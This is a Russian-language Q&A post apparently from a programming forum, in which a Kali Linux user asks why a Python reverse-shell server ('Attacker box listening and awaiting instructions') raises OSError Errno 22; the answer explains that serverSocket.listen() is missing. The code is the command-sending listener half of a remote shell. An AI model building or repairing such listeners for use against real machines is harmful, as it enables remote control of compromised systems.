# OSError: [Errno 22] Invalid argument ошибка без особой причины

Tags: python-3.x, kali-linux

Вот код

```
from socket import *
    serverPort = 8000 
    serverSocket = socket(AF_INET, SOCK_STREAM)
    serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) 
    serverSocket.bind(('', serverPort)) 
    print("Attacker box listening and awaiting instructions") 
    connectionSocket, addr = serverSocket.accept() 
    print("Thanks for connecting to me "
               +str(addr)) 
    message = connectionSocket.recv(1024)
    print(message) 
    command ="" 
    while command != "exit":
         command = input("Please enter a command: ") 
    connectionSocket.send(command.encode())
    message = connectionSocket.recv(1024).decode() 
    print(message)
            
    connectionSocket.shutdown(SHUT_RDWR)
    connectionSocket.close()
```

Выдает 2 ошибки в синтаксисе ошибок  нет

```
File "/home/kali/Desktop/shell/shellServer.py", line 7, in <module>
    connectionSocket, addr = serverSocket.accept() 
  File "/usr/lib/python3.9/socket.py", line 293, in accept
    fd, addr = self._accept()
OSError: [Errno 22] Invalid argument
```

Answer (score 2):

Перед `connectionSocket, addr = serverSocket.accept()` вы забыли добавить `serverSocket.listen()`, и получается, что сервер не принимает никаких подключений и следовательно у Вас не создаётся **connectionSocket**.